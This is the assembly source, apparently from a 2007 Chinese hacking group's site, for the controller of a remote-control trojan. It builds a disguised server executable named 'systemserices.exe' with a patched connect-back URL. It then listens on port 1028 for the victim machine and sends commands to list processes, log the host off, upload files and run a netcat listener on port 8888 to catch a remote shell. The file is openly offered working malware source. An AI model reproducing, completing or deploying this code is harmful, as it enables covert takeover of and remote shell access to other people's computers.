📄 redrabbit.asm
字号:
;******************************************************
;程序编写by Asm
;日期:2007-4-10日
;出处:http://www.wolfexp.net/(红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组(http://www.wolfexp.net/)
;******************************************************
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include wsock32.inc
includelib wsock32.lib
include shell32.inc
includelib shell32.lib
include macros.inc
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Equ 等值定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ICO_MAIN equ 1000h ;图标
DLG_MAIN equ 1
DLG_LOOK equ 2
IDB_1 equ 3
DLG_SEND equ 4
IDC_Process equ 1001
IDC_MingLing equ 1002
IDC_Close equ 1003
IDC_Cmd equ 1004
IDC_Serices equ 1005
IDC_BMP equ 1006
IDC_ServerList equ 1007
IDC_Upfile equ 1008
IDC_Out equ 1009
IDC_ShuoMing equ 1010
IDC_URL equ 1011
IDC_23 equ 1012
IDC_24 equ 1013
IDC_25 equ 1014
IDC_26 equ 1015
ASM equ 101
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
hInstance dd ?
hWinMain dd ?
hSocket dd ?
dwCount dd ?
szReadBuffer db 32768 dup (?)
szBuffer db 32768 dup (?)
hSocket1 dd ?
szCurrentDirectory db 1024 dup(?)
szCurrentDirectory1 db 1024 dup(?)
szUrl db 1024 dup(?)
szFilePath db 1024 dup(?)
stStartUp STARTUPINFO <?>
stProcInfo PROCESS_INFORMATION <?>
.data
szFormat db '%s',13,10,0
szSay db '这个程序是偶学习TCP/IP协议的一个作品',13,10
db '默认监听端口是1028,只支持一个用户连接',13,10
db '并且只使用一次,HOHO~~~~',13,10
db '偶的汇编功底都JB烂死了,所以这程序bug多多',13,10
db '同时又碰巧快到6月份高考,偶上网的时间已经减少',13,10
db '这样一来要想完善它,还得一步一步来',13,10
db '偶发布的这个版本是最初版本',13,10
db '功能也仅仅限制于cmd,进程查看,信息查看,文件查看,注销主机',13,10
db '当然,这个程序是开源的,我们一起来完善它,看谁写得好 *^_^*',13,10
db '我的QQ:448761813,欢迎交流',13,10
db 'By asm 2007-4-9',13,10,0
szLook db '本程序采用网页连接的方式,不支持IP',13,10
db '比如 Http://bbs.hackok/ip.txt 其中ip.txt的内容是你的IP',13,10,0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
_AddClient proc
inc dwCount
invoke wsprintf,addr szBuffer,CTXT("%d--127.0.0.1"),dwCount
invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_ADDSTRING,0,addr szBuffer
ret
_AddClient endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RecvData proc _hSocket
local @dwRecv
invoke SendDlgItemMessage,hWinMain,IDC_MingLing,LB_RESETCONTENT,0,0
.while TRUE
invoke RtlZeroMemory,addr szReadBuffer,sizeof szReadBuffer
invoke RtlZeroMemory,addr szBuffer,sizeof szBuffer
invoke recv,_hSocket,addr szReadBuffer,sizeof szReadBuffer,NULL
mov @dwRecv,eax
invoke lstrlen,addr szReadBuffer
.if eax!=NULL
invoke wsprintf,addr szBuffer,addr szFormat,addr szReadBuffer
invoke SendDlgItemMessage,hWinMain,IDC_MingLing,LB_ADDSTRING,0,addr szBuffer
.elseif
jmp close
.endif
.break .if @dwRecv==NULL
;********************************************************************
; 按照客户端列表逐一发送
;********************************************************************
.endw
close:
ret
_RecvData endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 初始化 Socket,绑定到服务TCP端口并监听
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Init proc
local @stWsa:WSADATA
local @stSin:sockaddr_in
invoke WSAStartup,101h,addr @stWsa
invoke socket,AF_INET,SOCK_STREAM,0
mov hSocket,eax
invoke RtlZeroMemory,addr @stSin,sizeof @stSin
invoke htons,1028
mov @stSin.sin_port,ax
mov @stSin.sin_family,AF_INET
mov @stSin.sin_addr,INADDR_ANY
invoke bind,hSocket,addr @stSin,sizeof @stSin
.if eax == SOCKET_ERROR
invoke MessageBox,hWinMain,CTXT("无法绑定到TCP端口1028,请检查是否有其它程序在使用!"),NULL,\
MB_OK or MB_ICONWARNING
invoke SendMessage,hWinMain,WM_CLOSE,0,0
.else
invoke listen,hSocket,5
.endif
invoke accept,hSocket,0,0
.if eax==INVALID_SOCKET
mov eax,FALSE
.endif
mov hSocket1,eax
invoke _AddClient
ret
_Init endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;修改指定偏移地址处的数据子程序
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
MapViewFile proc uses ebx esi edi,lpProcessAddress:LPSTR,_url:DWORD
mov edi,lpProcessAddress ;获取初始地址
add edi,0026a0h
invoke lstrcpy,edi,_url
invoke MessageBox,NULL,CTXT("恭喜,服务端生成完毕!"),CTXT("恭喜"),MB_ICONINFORMATION
ret
MapViewFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetServer proc _url
local hRsrc,dwSize,hResData,lpData,lpRes,dwSizeWritten,hFile,hMapView,pMapView
invoke lstrlen,_url
.if eax <= 21
invoke MessageBox,NULL,CTXT("填写的URL小于预定字节,无法生成!"),NULL,MB_ICONSTOP
.elseif eax >= 60
invoke MessageBox,NULL,CTXT("填写的URL大于预定字节,无法生成!"),NULL,MB_ICONSTOP
.elseif
invoke FindResource,NULL,ASM,RT_RCDATA;查找ASM资源
mov hRsrc,eax
invoke SizeofResource,NULL,hRsrc
mov dwSize,eax
invoke LoadResource,NULL,hRsrc
mov hResData,eax
invoke GlobalAlloc,GPTR,dwSize
mov lpData,eax
invoke LockResource,hResData
mov lpRes,eax
invoke CreateFile,CTXT("systemserices.exe"),GENERIC_WRITE,FILE_SHARE_READ,\
NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL ;打开文件
.if eax != NULL
mov hFile,eax
invoke WriteFile,hFile,lpRes,dwSize,addr dwSizeWritten,NULL
invoke CloseHandle,hRsrc
invoke CloseHandle,hResData
invoke CloseHandle,hFile
invoke GlobalFree,lpData
.endif
invoke CreateFile,CTXT("systemserices.exe"),GENERIC_READ or GENERIC_WRITE,\ ;打开它
FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_EXISTING, \
FILE_ATTRIBUTE_NORMAL,NULL
.if eax!=INVALID_HANDLE_VALUE
mov hFile, eax ;保存句柄
invoke CreateFileMapping,hFile,NULL,PAGE_READWRITE,0,0,NULL;建立内存共享
.if eax!=NULL
mov hMapView,eax ;保存句柄
invoke MapViewOfFile,hMapView,FILE_MAP_WRITE,0,0,NULL;读取内存共享
.if eax!=NULL
mov pMapView,eax ;保存句柄
invoke MapViewFile,pMapView,_url
.endif
invoke UnmapViewOfFile,pMapView;解除文件映射
.endif
invoke CloseHandle,hMapView;关闭内存映射文件
.endif
invoke CloseHandle,hFile;关闭文件
.endif
ret
_GetServer endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcSendFile proc uses ebx edi esi hWnd,wMsg,wParam,lParam
local ThreadId4
mov eax,wMsg
.if eax == WM_CLOSE
invoke EndDialog,hWnd,NULL
.elseif eax == WM_INITDIALOG
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
invoke SetDlgItemText,hWnd,IDC_URL,CTXT("http://127.0.0.1/1.txt")
.elseif eax == WM_COMMAND
mov eax,wParam
.if eax == IDC_26
invoke GetDlgItemText,hWnd,IDC_25,addr szFilePath,sizeof szFilePath
invoke lstrlen,addr szFilePath
.if eax==NULL
invoke MessageBox,hWnd,CTXT("文件路径不能为空"),NULL,MB_ICONSTOP
.elseif
invoke lstrlen,addr szFilePath
invoke send,hSocket1,addr szFilePath,eax,0
invoke CreateThread,NULL,0,addr _RecvData,hSocket1,0,addr ThreadId4
xor eax,eax
.endif
.endif
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
_ProcSendFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcLook proc uses ebx edi esi hWnd,wMsg,wParam,lParam
mov eax,wMsg
.if eax == WM_CLOSE
invoke EndDialog,hWnd,NULL
.elseif eax == WM_INITDIALOG
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
invoke SetDlgItemText,hWnd,IDC_URL,CTXT("http://127.0.0.1/1.txt")
.elseif eax == WM_COMMAND
mov eax,wParam
.if eax == IDC_23
invoke GetDlgItemText,hWnd,IDC_URL,addr szUrl,sizeof szUrl
invoke _GetServer,addr szUrl
.elseif eax == IDC_24
invoke MessageBox,hWnd,addr szLook,CTXT("配置说明"),MB_ICONINFORMATION
.endif
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
_ProcLook endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgMain proc uses ebx edi esi hWnd,wMsg,wParam,lParam
local ThreadId,ThreadId1,ThreadId2,ThreadId3
local @szBuffer[1024]:byte
mov eax,wMsg
.if eax == WM_CLOSE
invoke closesocket,hSocket
invoke WSACleanup
invoke EndDialog,hWnd,NULL
.elseif eax == WM_INITDIALOG
push hWnd
pop hWinMain
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
invoke CreateThread,NULL,0,addr _Init,0,0,addr ThreadId
.elseif eax == WM_COMMAND
mov eax,wParam
.if ax == IDOK
invoke DialogBoxParam,hInstance,DLG_LOOK,NULL,offset _ProcLook,NULL
.elseif ax == IDC_Process
invoke SendDlgItemMessage,hWnd,IDC_MingLing,LB_RESETCONTENT,0,0
invoke lstrlen,CTXT("l")
invoke send,hSocket1,CTXT("l"),eax,0
xor eax,eax
invoke CreateThread,NULL,0,addr _RecvData,hSocket1,0,addr ThreadId2
.elseif ax == IDC_MingLing
shr eax,16
.if ax == LBN_DBLCLK
;********************************************************************
; 将鼠标点击结果显示在列表框中
;********************************************************************
invoke SendMessage,lParam,LB_GETCURSEL,0,0
lea ecx,@szBuffer
invoke SendMessage,lParam,LB_GETTEXT,eax,ecx
invoke MessageBox,NULL,addr @szBuffer,CTXT("信息查看"),MB_ICONINFORMATION
.endif
.elseif ax == IDC_Close
invoke SendDlgItemMessage,hWnd,IDC_MingLing,LB_RESETCONTENT,0,0
invoke lstrlen,CTXT("o")
invoke send,hSocket1,CTXT("o"),eax,0
xor eax,eax
invoke CreateThread,NULL,0,addr _RecvData,hSocket1,0,addr ThreadId2
.elseif ax == IDC_Cmd
invoke RtlZeroMemory,addr szCurrentDirectory,sizeof szCurrentDirectory
invoke RtlZeroMemory,addr szCurrentDirectory1,sizeof szCurrentDirectory1
invoke GetCurrentDirectory,200,addr szCurrentDirectory
invoke lstrcat,addr szCurrentDirectory1,addr szCurrentDirectory
invoke lstrcat,addr szCurrentDirectory1,CTXT("\")
invoke lstrcat,addr szCurrentDirectory1,CTXT("NC.exe")
invoke GetStartupInfo,addr stStartUp
invoke CreateProcess,addr szCurrentDirectory1,CTXT(" -vv -l -p 8888"),NULL,NULL,NULL,\
NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo
invoke lstrlen,CTXT("c")
invoke send,hSocket1,CTXT("c"),eax,0
xor eax,eax
.elseif ax == IDC_Serices
invoke lstrlen,CTXT("e")
invoke send,hSocket1,CTXT("e"),eax,0
invoke CreateThread,NULL,0,addr _RecvData,hSocket1,0,addr ThreadId3
xor eax,eax
.elseif ax == IDC_Upfile
invoke SendDlgItemMessage,hWnd,IDC_MingLing,LB_RESETCONTENT,0,0
invoke DialogBoxParam,hInstance,DLG_SEND,NULL,offset _ProcSendFile,NULL
.elseif ax == IDC_Out
invoke SendMessage,hWnd,WM_CLOSE,0,0
.elseif ax == IDC_ShuoMing
invoke MessageBox,hWnd,addr szSay,CTXT("关于程序说明"),MB_ICONINFORMATION
.endif
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
_ProcDlgMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
invoke GetModuleHandle,NULL
mov hInstance,eax
invoke DialogBoxParam,hInstance,DLG_MAIN,NULL,offset _ProcDlgMain,NULL
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -